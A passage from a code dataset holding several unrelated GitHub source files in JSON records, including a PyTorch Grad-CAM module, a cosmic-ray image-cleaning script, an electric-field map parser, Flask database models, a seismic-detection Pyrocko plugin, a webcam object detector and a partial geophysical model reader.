new_string\nprint(rotate_word(\"labas\",5))","repo_name":"balbazauras/think-python","sub_path":"Chapter8_strings/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25140445489","text":"import torch\nimport torch.nn.functional as F\n\nfrom utils import find_alexnet_layer, find_vgg_layer, find_resnet_layer, find_densenet_layer, find_squeezenet_layer\n\n\nclass GradCAM(object):\n \n def __init__(self, model_dict, verbose=False):\n model_type = model_dict['type']\n layer_name = model_dict['layer_name']\n self.model_arch = model_dict['arch']\n\n self.gradients = dict()\n self.activations = dict()\n def backward_hook(module, grad_input, grad_output):\n self.gradients['value'] = grad_output[0]\n return None\n def forward_hook(module, input, output):\n self.activations['value'] = output\n return None\n\n if 'vgg' in model_type.lower():\n target_layer = find_vgg_layer(self.model_arch, layer_name)\n elif 'resnet' in model_type.lower():\n target_layer = find_resnet_layer(self.model_arch, layer_name)\n elif 'densenet' in model_type.lower():\n target_layer = find_densenet_layer(self.model_arch, layer_name)\n elif 'alexnet' in model_type.lower():\n target_layer = find_alexnet_layer(self.model_arch, layer_name)\n elif 'squeezenet' in model_type.lower():\n target_layer = find_squeezenet_layer(self.model_arch, layer_name)\n\n target_layer.register_forward_hook(forward_hook)\n target_layer.register_backward_hook(backward_hook)\n\n if verbose:\n try:\n input_size = model_dict['input_size']\n except KeyError:\n print(\"please specify size of input image in model_dict. e.g. 
{'input_size':(224, 224)}\")\n pass\n else:\n device = 'cuda' if next(self.model_arch.parameters()).is_cuda else 'cpu'\n self.model_arch(torch.zeros(1, 3, *(input_size), device=device))\n print('saliency_map size :', self.activations['value'].shape[2:])\n\n\n def forward(self, input, class_idx=None, retain_graph=False):\n \n b, c, h, w = input.size()\n\n logit = self.model_arch(input)\n if class_idx is None:\n score = logit[:, logit.max(1)[-1]].squeeze()\n else:\n score = logit[:, class_idx].squeeze()\n\n self.model_arch.zero_grad()\n score.backward(retain_graph=retain_graph)\n gradients = self.gradients['value']\n activations = self.activations['value']\n b, k, u, v = gradients.size()\n\n alpha = gradients.view(b, k, -1).mean(2)\n #alpha = F.relu(gradients.view(b, k, -1)).mean(2)\n weights = alpha.view(b, k, 1, 1)\n\n saliency_map = (weights*activations).sum(1, keepdim=True)\n saliency_map = F.relu(saliency_map)\n saliency_map = F.upsample(saliency_map, size=(h, w), mode='bilinear', align_corners=False)\n saliency_map_min, saliency_map_max = saliency_map.min(), saliency_map.max()\n saliency_map = (saliency_map - saliency_map_min).div(saliency_map_max - saliency_map_min).data\n\n return saliency_map, logit\n\n def __call__(self, input, class_idx=None, retain_graph=False):\n return self.forward(input, class_idx, retain_graph)\n\n\nclass GradCAMpp(GradCAM):\n \n def __init__(self, model_dict, verbose=False):\n super(GradCAMpp, self).__init__(model_dict, verbose)\n\n def forward(self, input, class_idx=None, retain_graph=False):\n \n b, c, h, w = input.size()\n\n logit = self.model_arch(input)\n if class_idx is None:\n score = logit[:, logit.max(1)[-1]].squeeze()\n else:\n score = logit[:, class_idx].squeeze() \n \n self.model_arch.zero_grad()\n score.backward(retain_graph=retain_graph)\n gradients = self.gradients['value'] # dS/dA\n activations = self.activations['value'] # A\n b, k, u, v = gradients.size()\n\n alpha_num = gradients.pow(2)\n alpha_denom = gradients.pow(2).mul(2) + \\\n activations.mul(gradients.pow(3)).view(b, k, u*v).sum(-1, keepdim=True).view(b, k, 1, 1)\n alpha_denom = torch.where(alpha_denom != 0.0, alpha_denom, torch.ones_like(alpha_denom))\n\n alpha = alpha_num.div(alpha_denom+1e-7)\n positive_gradients = F.relu(score.exp()*gradients) # ReLU(dY/dA) == ReLU(exp(S)*dS/dA))\n weights = (alpha*positive_gradients).view(b, k, u*v).sum(-1).view(b, k, 1, 1)\n\n saliency_map = (weights*activations).sum(1, keepdim=True)\n saliency_map = F.relu(saliency_map)\n saliency_map = F.upsample(saliency_map, size=(224, 224), mode='bilinear', align_corners=False)\n saliency_map_min, saliency_map_max = saliency_map.min(), saliency_map.max()\n saliency_map = (saliency_map-saliency_map_min).div(saliency_map_max-saliency_map_min).data\n\n return saliency_map, logit\n","repo_name":"RutwikPatel13/Cataract_Detection_with_XAI","sub_path":"gradcam.py","file_name":"gradcam.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74354025126","text":"import cv2\nimport numpy as np\n# ----- step 1 -----\n# 將有宇宙射線的圖片轉為負片\n# ----- step 2 -----\n# 拉普拉斯邊緣檢測負片\n# ----- step 3 -----\n# 濾鏡處理拉普拉斯檢測的負片\n\n# TODO: 優化整個程式流程 變成只要執行一次就好 且過程不存圖(創新檔案)\n# 新想法是,每次跑完流程,就調低檢測宇宙射線的判斷閥值,再跑一次流程\n# 有機會可以去除乾淨\ndef SaveImg(image_name, img):\n cv2.imwrite(image_name, img)\n\n\ndef NegativeFilm(row, col):\n nagativeImg = np.zeros(shape=(row, col, 1), dtype=np.uint8)\n for r in range(row):\n for c in range(col):\n nagativeImg[r, c] 
\n\nSTEP = 1\n# edit these paths by hand\ninput_path = \"./data_set/img_with_cosmic/\"\noutput_path = \"./data_set/img_with_cosmic/\"\nfilename = \"sample.png\"\n\nif __name__ == '__main__':\n    # input grayscale image\n    img = cv2.imread(input_path+filename, 0)\n    # get the image size\n    img_rows = img.shape[0]\n    img_cols = img.shape[1]\n    # marks where cosmic rays are\n    markedImgMap = np.zeros(shape=(img_rows, img_cols, 1), dtype=np.uint8)\n\n    # step 1: save the negative\n    if STEP == 1:\n        SaveImg(output_path+filename, NegativeFilm(img_rows, img_cols))\n\n    # step 2: Laplacian edge detection\n    elif STEP == 2:\n        la_img = cv2.Laplacian(img, cv2.CV_16S, ksize=3)\n        la_img = cv2.convertScaleAbs(la_img)\n        SaveImg(output_path+filename, la_img)\n\n    # step 3: filter the Laplacian-detected negative\n    # open a 3x3 detection window\n    # check whether the centre grey value is almost white and differs a lot from its surroundings (like > 210 or something)\n    # if so, mark its coordinates\n    elif STEP == 3:\n        la_edge_img = cv2.imread(\"./data_set/img_edge/\"+filename, 0)\n        counter = 0\n        for i in range(1, img_rows-1):\n            for j in range(1, img_cols-1):\n                markedImgMap[i, j] = MarkComsic(la_edge_img, i, j)\n        # SaveImg(\"./data_set/img_output/\"+filename, markedImgMap)\n        # step 4: go back to the ordinary image and smooth those regions away, top to bottom and left to right\n        # cv2.filter2D(img, -1, kernel)\n        origin_image = cv2.imread(\"./data_set/img_with_cosmic/\"+\"data1.png\", 0)\n        for i in range(1, img_rows-1):\n            for j in range(1, img_cols-1):\n                if markedImgMap[i, j] == 1:\n                    origin_image[i, j] = blurred(origin_image, i, j)\n                    # ----- poor results -----\n                    # processing with a [[2,2,2],[2,0,0],[0,0,0]] filter gives blur1; processing the marked-2 cells again gives blur2; blur1 is better\n                    # # afterwards also flatten the parts marked 2\n                    # if markedImgMap[i-1, j] != 1:\n                    #     markedImgMap[i-1, j] = 2\n                    # if markedImgMap[i, j-1] != 1:\n                    #     markedImgMap[i, j-1] = 2\n                    # if markedImgMap[i+1, j] != 1:\n                    #     markedImgMap[i+1, j] = 2\n                    # if markedImgMap[i, j+1] != 1:\n                    #     markedImgMap[i, j+1] = 2\n\n        # for i in range(1, img_rows-1):\n        #     for j in range(1, img_cols-1):\n        #         if markedImgMap[i, j] == 2:\n        #             origin_image[i, j] = blurred(origin_image, i, j)\n        # --------------------\n        # treating blur1 as the original image and running the pipeline again from step 1 yields blur1_round2\n        SaveImg(\"./data_set/img_output/\"+\"newImg.png\", origin_image)\n\n    # # binarization\n    # ret, th1 = cv2.threshold(la_img, 127, 255, cv2.THRESH_BINARY)\n\n    # Canny is too sharp; celestial bodies, galaxies and nebulae are no longer visible\n    # canny_img = cv2.Canny(img, 50, 110)\n\n    # cv2.imshow(\"nor\", img)\n    # cv2.imshow(\"naga\", NegativeFilm(img_rows, img_cols))\n    # cv2.waitKey()\n    # cv2.destroyAllWindows()\n
","repo_name":"linliu0624/Comsic_Ray_Remove","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23761901075","text":"import numpy as np\nimport math\n\n#\n# Open OPERA map file and read in data\n#\ndata = np.loadtxt('/Users/ekargian/Documents/g-2/Magnets/ElectrostaticQuads/E-field/OPERA-simulations/short_quad_ideal.table', comments='!')\nx=data[:,0]\ny=data[:,1]\nz=data[:,2]\nr=data[:,3]\n# phi=data[:,4] -- unnecessary because not in [0,2pi] - get from y/x instead\nphi = np.arctan2(y,x) # arctan2 returns phi within [-pi,pi] -- shifted to [0,2pi] below\n\nV=data[:,8]\n\n# distance of each \"pole\" in the bipolar coordinate system from origin.\n# defined in cm, same as coordinates in file.\na=5.756 \n\n# toroidal coordinates\nmu = np.arctanh(2*a*r/(r*r+z*z+a*a))\neta = np.arctan(2*a*z/(r*r+z*z-a*a))\n# the above returns eta in [-pi/2,pi/2], fix below\n\nfor i in range(len(eta)):\n    sineta = np.sin(eta[i])\n    taneta = np.tan(eta[i])\n    if sineta>=0:\n        if taneta>=0: #1st quadrant\n            continue # eta value already should be correct\n        else: \n            #eta[i]<0, 2nd quadrant\n            eta[i] = np.pi + eta[i]\n    else:\n        if taneta>=0: #eta[i]>0, 3rd quadrant\n            eta[i] = np.pi + eta[i]\n        else: \n            #eta[i]<0, 4th quadrant\n            eta[i] = 2*np.pi + eta[i]\n    # Lastly, shift phi values to the [0,2pi] range\n    if phi[i]<0:\n        phi[i] = 2*np.pi + phi[i]\n
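\n# Hedged editorial self-check (not part of the original analysis): the\n# textbook inverse of the toroidal map is r = a*sinh(mu)/(cosh(mu)-cos(eta))\n# and z = a*sin(eta)/(cosh(mu)-cos(eta)); round-tripping one sample point\n# should reproduce its cylindrical coordinates up to floating-point error.\ndenom = np.cosh(mu[0]) - np.cos(eta[0])\nprint('round-trip residuals:', a*np.sinh(mu[0])/denom - r[0], a*np.sin(eta[0])/denom - z[0])\n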
\n# Open output file\nf= open(\"short_quad_ideal_outererR.dat\",\"w+\")\n\naccepted_entries=0\nfor i in range(len(r)):\n    if math.sqrt(math.pow(r[i]-711.2,2)+math.pow(z[i],2))<5.05 and math.sqrt(math.pow(r[i]-711.2,2)+math.pow(z[i],2))>4.995 and abs(V[i])>5000:\n        for item in data[i]:\n            f.write('%.11E '%item, )\n        f.write('%.11E %.11E %.11E\\n'%(mu[i],eta[i],phi[i]))\n        accepted_entries += 1\n\nf.close()\nprint('Total accepted entries :: ', accepted_entries)","repo_name":"ManolisKar/Efield_multipoles","sub_path":"macros/parse_file.py","file_name":"parse_file.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17664467363","text":"# create models\nfrom flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\nclass User(db.Model):\n    __tablename__ = 'users'\n    uid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n    username = db.Column(db.String(64), unique=True, nullable=False)\n    password = db.Column(db.String(128), nullable=False)\n    posts = db.relationship('Post', backref='postauth', lazy='dynamic')\n\n    def __repr__(self):\n        #return '<User %r>' % self.username\n        return '{}'.format(self.username)\n\nclass Followers(db.Model):\n    __tablename__ = 'followers'\n    fid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n    follower_id = db.Column(db.Integer, db.ForeignKey('users.uid'), nullable=False)\n    followed_id = db.Column(db.Integer, db.ForeignKey('users.uid'), nullable=False)\n\nclass Post(db.Model):\n    __tablename__ = 'posts'\n    pid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n    author = db.Column(db.Integer, db.ForeignKey('users.uid') , nullable=False)\n    content = db.Column(db.String(1024), nullable=False)\n\n#post_descr = db.Table('post_descr',\n#    db.Column('user_id', db.Integer, db.ForeignKey('user.id')),\n#    db.Column('message_id', db.Integer, db.ForeignKey('message.id')),\n#    info={'bind_key': 'users'}\n#)\n\n#class PostDescr(db.Model):\n#    __tablename__ = 'postDescr'\n#    pid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n#    author = db.Column(db.Integer, db.ForeignKey('users.uid') , nullable=False)\n#    content = db.Column(db.String(1024), nullable=False)\n#    uid = db.Column(db.Integer, primary_key=True, autoincrement=True)\n#    username = db.Column(db.String(64), unique=True, nullable=False)\n","repo_name":"nanaoansah/Hwk3_E-14a","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"75115186087","text":"import copy\nimport os\nimport numpy as num\nimport logging\n\nfrom pyrocko import util, model, orthodrome, pile\nfrom pyrocko.gui import snuffler\nfrom pyrocko.gui import marker as pmarker\nfrom pyrocko.gui import util as gui_util\nfrom pyrocko.gui.snuffling import Snuffling, Param, Choice, Switch\nfrom silvertine.seiger_lassie import geo, ifc\n\n\nlogger = logging.getLogger('seiger_lassie.snuffling')\n\n\nkind_default = '1 (green)'\n\n\ndef detections_to_event_markers(fn_detections):\n    markers = []\n    if fn_detections:\n        with open(fn_detections, 'r') as f:\n            for line in f.readlines():\n                data = line.split()\n                i, t_d, t_t, apeak, latpeak, lonpeak, xpeak, ypeak, zpeak = \\\n                    data\n                lat, lon = orthodrome.ne_to_latlon(\n                    float(latpeak), float(lonpeak), float(xpeak), float(ypeak))\n                t = util.str_to_time(\"%s %s\" % (t_d, t_t))\n                label = \"%s-%s\" % (apeak, i)\n                e = model.Event(lat=lat, lon=lon, depth=float(zpeak),\n                                name=label, time=t)\n                m = gui_util.EventMarker(e, kind=int(kind_default[0]))\n                markers.append(m)\n\n    return markers\n\n\nclass LassieSnuffling(Snuffling):\n\n    @property\n    def __doc__(self):\n        s = '''\n

Scrutinize Lassie Performance and Re-Detect\n\n        Adjust the detector threshold, press run. From every instant, where
 the signal rises above threshold, a time length\n        of tsearch seconds is searched for a maximum. Detections are\n        added as event markers to the viewer.\n\n        If you want to save the updated detections, it might be helpful to use\n        the marker table (see Snuffler Tutorial at the bottom) to sort all\n        markers by their kind.\n\n        Compare Lassie Detections with Reference Catalog\n\n        %s\n

\n \n \n\n ''' % self.show_comparison.__doc__\n return s\n\n def __init__(self):\n Snuffling.__init__(self)\n self.config = None\n self.detections = []\n\n def setup(self):\n if self.config:\n detector_default = self.config.detector_threshold\n else:\n detector_default = 100.\n\n self.set_name('Lassie investigate')\n self.add_parameter(Param('Tsearch', 'tsearch', 20., 0.01, 100))\n self.add_parameter(Param(\n 'Detector threshold', 'detector_threshold', detector_default, 1.,\n 10000.))\n self.add_parameter(Switch('Level Trace', 'level_trace', False))\n self.add_parameter(Switch(\n 'Hold comparison figure', 'hold_figure', False))\n self.add_parameter(Choice(\n 'new marker kind', 'marker_kind', kind_default,\n ['1 (green)', '2 (blue)', '3 (orange)', '4 (purple)', '5 (brown)',\n '0 (red)']))\n self.add_trigger('load reference', self.load_comparison)\n self.add_trigger('show comparison', self.show_comparison)\n self.add_trigger('remove comparison', self.remove_comparison)\n # self.add_trigger('read Lassie config', self.fail)\n self.set_live_update(True)\n self.markers_compare = []\n self.detections = []\n self.fig = None\n self.fframe = None\n self.grid = self.config.get_grid()\n\n def mycleanup(self):\n viewer = self.get_viewer()\n viewer.release_data(self._tickets)\n viewer.remove_markers(self.detections)\n self._tickets = []\n self._markers = []\n\n def call(self):\n self.mycleanup()\n self.detections = []\n i_detection = 0\n zpeak = 0.\n lat = 0.\n lon = 0.\n for traces in self.chopper_selected_traces(\n mode='all',\n trace_selector=lambda x: x.station == \"SMAX\",\n fallback=True):\n tr_smax = [tr for tr in traces if tr.location == '']\n tr_i = [tr for tr in traces if tr.location == 'i']\n if not tr_i:\n tr_i = [None] * len(tr_smax)\n\n for tr_i, tr_stackmax in zip(tr_i, tr_smax):\n tpeaks, apeaks = tr_stackmax.peaks(\n self.detector_threshold, self.tsearch)\n if self.level_trace:\n ltrace = tr_stackmax.copy(data=False)\n ltrace.set_ydata(\n num.ones(\n tr_stackmax.data_len()) * self.detector_threshold)\n self.add_trace(ltrace)\n for t, a in zip(tpeaks, apeaks):\n if tr_i:\n lat, lon, xpeak, ypeak, zpeak = \\\n self.grid.index_to_location(tr_i(t)[1])\n\n lat, lon = orthodrome.ne_to_latlon(\n lat, lon, xpeak, ypeak)\n\n e = model.Event(\n time=t, name=\"%s-%s\" % (i_detection, a), lat=lat,\n lon=lon, depth=zpeak)\n self.detections.append(\n gui_util.EventMarker(\n event=e, kind=int(self.marker_kind[0])))\n i_detection += 1\n self.add_markers(self.detections)\n\n if self.hold_figure:\n self.show_comparison()\n\n def load_comparison(self):\n '''\n For comparison in synthetic tests.\n '''\n fn = self.input_filename(caption='Select an event catalog')\n kind_compare = 4\n compare_events = model.load_events(fn)\n markers = [gui_util.EventMarker(event=e, kind=kind_compare) for e in\n compare_events]\n\n self.markers_compare = markers\n self.add_markers(self.markers_compare)\n\n def remove_comparison(self):\n '''Remove comparison markers from viewer.'''\n self.get_viewer().remove_markers(self.markers_compare)\n\n def filter_visible(self, markers):\n vtmin, vtmax = self.get_viewer().get_time_range()\n return [x for x in markers if vtmin < x.tmin < vtmax]\n\n def show_comparison(self):\n '''\n Iterates through reference catalog and searches for lassie detection\n candidates in a time window of +- 1.5 seconds around the reference.\n\n If multiple candidates are available selects the first as the matching\n lassie detection for this reference.\n\n This option requires the catalog to contain only 
pyrocko.model.Event\n instances.\n '''\n scan_time = 3.\n # select_by = 'first'\n\n if not self.markers_compare:\n self.fail('No catalog to compare to')\n\n markers_compare = self.filter_visible(self.markers_compare)\n not_detected = []\n detections_success = []\n detections = copy.deepcopy(self.filter_visible(self.detections))\n for i_m, mcompare in enumerate(markers_compare):\n detection_times = num.array([d.tmin for d in detections])\n i_want = num.where(num.abs(detection_times - mcompare.tmin)\n < (scan_time / 2.))[0]\n if len(i_want) == 0:\n not_detected.append(mcompare)\n continue\n\n candidates = [detections[i] for i in i_want]\n\n # if select_by == 'first':\n matched_marker = min(\n candidates, key=lambda x: x.get_event().time)\n\n # elif select_by == 'strongest':\n # matched_marker = max(\n # candidates, key=lambda x: float(x.get_event().name))\n\n detections_success.append((matched_marker, i_m))\n\n for c in candidates:\n detections.remove(c)\n\n if self.hold_figure and self.fframe and not self.fframe.closed:\n self.fig.clf()\n else:\n self.fframe = self.pylab('Lassie', get='figure_frame')\n self.fig = self.fframe.gcf()\n\n ax = self.fig.add_subplot(111)\n compare_events = [x.get_event() for x in markers_compare]\n associated_events = [compare_events[a[1]] for a in detections_success]\n magnitudes = [e.get_event().magnitude for e in markers_compare]\n detected_magnitudes = [e.magnitude for e in associated_events]\n bins = num.linspace(-1, max(magnitudes), 30)\n ax.hist([detected_magnitudes, magnitudes], bins,\n label=['Lassie', 'Reference'], alpha=0.7)\n n_leftover_detections = len(detections)\n n_undetected = len(not_detected)\n\n ax.text(\n 0.05, 0.95, 'Other detections: %s\\nNot detected: %s (%1.1f %%)' %\n (n_leftover_detections, n_undetected,\n (float(n_undetected)/len(markers_compare)*100.)),\n transform=ax.transAxes)\n\n ax.set_xlabel('Magnitude')\n ax.set_ylabel('N detections')\n ax.legend()\n self.fig.canvas.draw()\n\n\ndef __snufflings__():\n return [LassieSnuffling()]\n\n\ndef snuffle(config):\n global _lassie_config\n _lassie_config = copy.deepcopy(config)\n for _ifc in _lassie_config.image_function_contributions:\n _ifc.setup(config)\n\n def load_snuffling(win):\n s = LassieSnuffling()\n s.config = _lassie_config\n s.setup()\n win.pile_viewer.viewer.add_snuffling(s, reloaded=True)\n win.pile_viewer.viewer.add_blacklist_pattern('*.SMAX.i.*')\n for bl in _lassie_config.blacklist:\n win.pile_viewer.viewer.add_blacklist_pattern('%s.*' % bl)\n\n detections_path = _lassie_config.get_detections_path()\n\n if os.path.exists(detections_path):\n s.detections = detections_to_event_markers(detections_path)\n s.add_markers(s.detections)\n\n for _ifc in s.config.image_function_contributions:\n if isinstance(_ifc, ifc.ManualPickIFC):\n markers_path_extra = _ifc.picks_path\n elif isinstance(_ifc, ifc.TemplateMatchingIFC):\n markers_path_extra = _ifc.template_markers_path\n else:\n continue\n\n if os.path.exists(markers_path_extra):\n s.add_markers(pmarker.load_markers(markers_path_extra))\n else:\n logger.warn('No such file: %s (referenced in %s, named %s)' % (\n markers_path_extra, _ifc.__class__.__name__, _ifc.name))\n\n receivers = config.get_receivers()\n stations = set()\n lats, lons = geo.points_coords(receivers, system='latlon')\n for ir, (lat, lon) in enumerate(zip(lats, lons)):\n n, s, l = receivers[ir].codes[:3]\n stations.add(model.Station(\n lat=lat, lon=lon, network=n, station=s, location=l))\n\n paths = config.expand_path(config.data_paths)\n 
paths.append(config.get_ifm_dir_path())\n\n p = pile.make_pile(paths=paths, fileformat='detect')\n\n meta = {'tabu': True}\n for tr in p.iter_traces(trace_selector=lambda x: x.station == 'SMAX'):\n if tr.meta:\n tr.meta.update(meta)\n else:\n tr.meta = meta\n\n snuffler.snuffle(p, stations=stations,\n launch_hook=load_snuffling)\n\n\n__all__ = [\n 'snuffle']\n","repo_name":"braunfuss/silvertine","sub_path":"src/seiger_lassie/snuffling.py","file_name":"snuffling.py","file_ext":"py","file_size_in_byte":11440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7723887157","text":"from YouTubeSearch.youtube import YoutubeSearch\r\nimport json\r\n\r\n# Search using keywords and on page 2\r\nsearch = YoutubeSearch()\r\nresult = search.search('advanced python tutorial', type='playlist')\r\nif result['success']:\r\n print(json.dumps(result, indent=4))\r\n\r\n# Get information of a video\r\nresult = search.info('https://www.youtube.com/watch?v=dQw4w9WgXcQ')\r\nif result['success']:\r\n print(json.dumps(result, indent=4))\r\n","repo_name":"xenmods/YouTubeSearch","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"33400025817","text":"\"\"\"\nEscape the segfault: the game\n\ndesigned in 2014 by Thomas Iwaszko et al.\nyou can reach me at thomas@gaudia-tech.com\n\"\"\"\n\nfrom Game import Game\n\ng = Game()\ng.run()\ndel g\n","repo_name":"wkta/esc_segfault","sub_path":"run_game.py","file_name":"run_game.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24240298791","text":"import cv2 \r\nimport cvlib as cv\r\nfrom cvlib.object_detection import draw_bbox\r\n\r\n# create a video capture object to open the camera and capture live video\r\nvideo = cv2.VideoCapture(0)\r\n\r\n# create an empty list to store detected object labels\r\nlabels = []\r\n\r\nwhile True:\r\n ret, frame = video.read() # read a frame from the video capture object\r\n\r\n # detect common objects in the frame\r\n # bbox contains the bounding box coordinates of the detected objects\r\n # label contains the class labels or names of the detected objects\r\n # conf contains the confidence levels of the detected objects\r\n bbox, label, conf = cv.detect_common_objects(frame)\r\n\r\n # draw boxes around the detected objects on the frame\r\n output_image = draw_bbox(frame, bbox, label, conf)\r\n\r\n # display the processed frame in a window titled \"Object Detection\"\r\n cv2.imshow(\"Object Detection\", output_image)\r\n\r\n # update the list of detected object labels without duplication\r\n for item in label:\r\n if item in labels:\r\n pass\r\n else:\r\n labels.append(item)\r\n\r\n # break the loop and close the camera window when the spacebar is pressed\r\n if cv2.waitKey(1) & 0xFF == ord(\" \"):\r\n break\r\n\r\ni = 0\r\nnew_sentence = []\r\n\r\n# loop through the detected object labels and creates a sentence to be shown\r\nfor label in labels:\r\n if i == 0:\r\n new_sentence.append(f\"I detected a {label}, and, \")\r\n else:\r\n new_sentence.append(f\"a {label}\")\r\n i += 1\r\n\r\n# print the sentence by joining the words in the new_sentence list\r\nprint(\" 
\".join(new_sentence))\r\n","repo_name":"shaecodes/Object-Detection","sub_path":"object_detection.py","file_name":"object_detection.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19208462800","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom . import views\n\n\n# Wire up our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API.\nurlpatterns = [\n path('api/v1/upload_file', views.upload_file, name=\"upload_file\"),\n path('api/v1/all_files', views.all_files, name=\"all_files\"),\n path('api/v1/display_rxtx', views.display_rxtx, name=\"display_rxtx\"),\n path('api/v1/display_rscp', views.display_rscp, name=\"display_rscp\"),\n path('api/v1/display_eclo', views.display_eclo, name=\"display_eclo\"),\n path('api/v1/display_rssi', views.display_rssi, name=\"display_rssi\"),\n path('api/v1/display_kmeans', views.k_means, name=\"k_means\"),\n path('api/v1/get_csv_data', views.get_csv_data, name=\"get_csv_data\")\n\n]","repo_name":"amanjhurani/SGH-Drive_Test_Analysis","sub_path":"backend/bsnl_backend/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2796299425","text":"import numpy as np\nfrom ...base import fileIO as fio\nfrom ..core.StatArray import StatArray\nfrom ..mesh.TopoRectilinearMesh2D import TopoRectilinearMesh2D\nfrom .Model import Model\n\n\nclass AarhusModel(Model):\n\n def __init__(self):\n \"\"\"Only used to instantiate the class.\n\n Use self.read2D or self.read3D to fill members of the class.\n\n \"\"\"\n self.mesh = None\n self.rho = None\n self.fid = None\n\n\n def pcolor(self, useDOI = True, **kwargs):\n\n if useDOI:\n alpha = np.ones(self.mesh.shape)\n cellId = self.mesh.z.cellIndex(self.doi)\n for i in range(self.mesh.x.nCells):\n alpha[cellId[i]:, i] = 0.0\n kwargs['alpha'] = alpha\n\n self.mesh.pcolor(self.rho, **kwargs)\n\n\n def plotDOI(self, xAxis='x', **kwargs):\n\n xtmp = self.mesh.getXAxis(xAxis, centres=True)\n\n (self.mesh.height.centres - self.doi).plot(x = xtmp, **kwargs)\n\n\n def plotElevation(self, **kwargs):\n self.mesh.plotHeight(**kwargs)\n\n\n def plotXY(self, **kwargs):\n self.mesh.plotXY(**kwargs)\n\n\n def readLineNumbers(self, fileName):\n \"\"\"Read in the line numbers from an inversion file.\n\n Parameters\n ----------\n fileName : str\n Path to the inversion file.\n\n \"\"\"\n\n # Get the total number of points to pre-allocate memory.\n with open(fileName, 'r') as f:\n # Skip the top of the file until we get the column headers\n line = ''\n nHeader = 0\n while not \"LINE\" in line:\n line = f.readline()\n nHeader += 1\n\n header = line.split()[1:]\n\n # We now have the header line, so grab the column indices for what we need\n lineIndex = 0\n\n for i, head in enumerate(header):\n head = head.lower()\n if head == \"line\":\n lineIndex = i\n break\n\n tmp = []\n line = fio.getRealNumbersfromLine(f.readline())\n tmp.append(line[lineIndex])\n\n for line in f:\n l = fio.getRealNumbersfromLine(line)[lineIndex]\n if l != tmp[-1]:\n tmp.append(l)\n\n return np.asarray(tmp)\n\n\n def read2D(self, fileName, lineNumber):\n \"\"\"Read in an inversion file from the Aarhus software\n\n Parameters\n ----------\n fileName : str\n Path to the inversion file.\n index : int\n Index of the line to read in 0 to nLines.\n lineNumber : float\n The line 
number to read in.\n\n        Returns\n        -------\n        self : TopoRectilinearMesh2D\n            The mesh.\n        values : geobipy.StatArray\n            The values of the model.\n\n        \"\"\"\n\n        # Get the total number of points to pre-allocate memory.\n        nLines = fio.getNlines(fname=fileName)\n\n        with open(fileName, 'r') as f:\n            # Skip the top of the file until we get the column headers\n            line = ''\n            nLayers = 0\n            nHeader = 0\n            while not \"LINE\" in line:\n                line = f.readline()\n                nHeader += 1\n                if \"NUMLAYER\" in line:\n                    nLayers = int(f.readline().split('/')[-1])\n                    nHeader += 1\n\n            nPoints = nLines - nHeader\n\n            header = line.split()[1:]\n\n            # We now have the header line, so grab the column indices for what we need\n            lineIndex = 0\n            xIndex = 1\n            yIndex = 2\n            zIndex = 6\n            fidIndex = 3\n            rhoIndex = []\n            topIndex = []\n            doiIndex = None\n\n            for i, head in enumerate(header):\n                head = head.lower()\n                if head == \"line\":\n                    lineIndex = i\n                elif head == \"x\":\n                    xIndex = i\n                elif head == \"y\":\n                    yIndex = i\n                elif head == \"fid\":\n                    fidIndex = i\n                elif head == \"topo\":\n                    zIndex = i\n                elif head == \"doi_lower\":\n                    doiIndex = i\n\n                if \"rho_i\" in head and not \"std\" in head:\n                    rhoIndex.append(i)\n                elif \"dep_top\" in head and not \"std\" in head:\n                    topIndex.append(i)\n\n            # Index arrays are set, pre-allocate memory\n            rhoIndex = np.asarray(rhoIndex, dtype=int)\n            topIndex = np.asarray(topIndex, dtype=int)\n\n            x = StatArray(nPoints, 'Easting', 'm')\n            y = StatArray(nPoints, 'Northing', 'm')\n            z = StatArray(nPoints, 'Elevation', 'm')\n            fid = StatArray(nPoints, 'Fiducial')\n            doi = StatArray(nPoints, 'Depth of investigation', 'm')\n            rho = np.zeros([nLayers, nPoints])\n            depthEdges = StatArray(nLayers+1, 'Depth', 'm')\n\n            # Skip the first data points that are not the line we need\n            line = fio.getRealNumbersfromLine(f.readline())\n\n            while line[lineIndex] != lineNumber:\n                line = fio.getRealNumbersfromLine(f.readline())\n\n            # Read in the data points for the requested line,\n            # assumes the data points for the given line are contiguous.\n            nPoints = 0\n            first = True\n            while line[lineIndex] == lineNumber:\n                if first:\n                    depthEdges[:-1] = line[topIndex]\n\n                x[nPoints] = line[xIndex]\n                y[nPoints] = line[yIndex]\n                z[nPoints] = line[zIndex]\n                fid[nPoints] = line[fidIndex]\n                rho[:, nPoints] = line[rhoIndex]\n                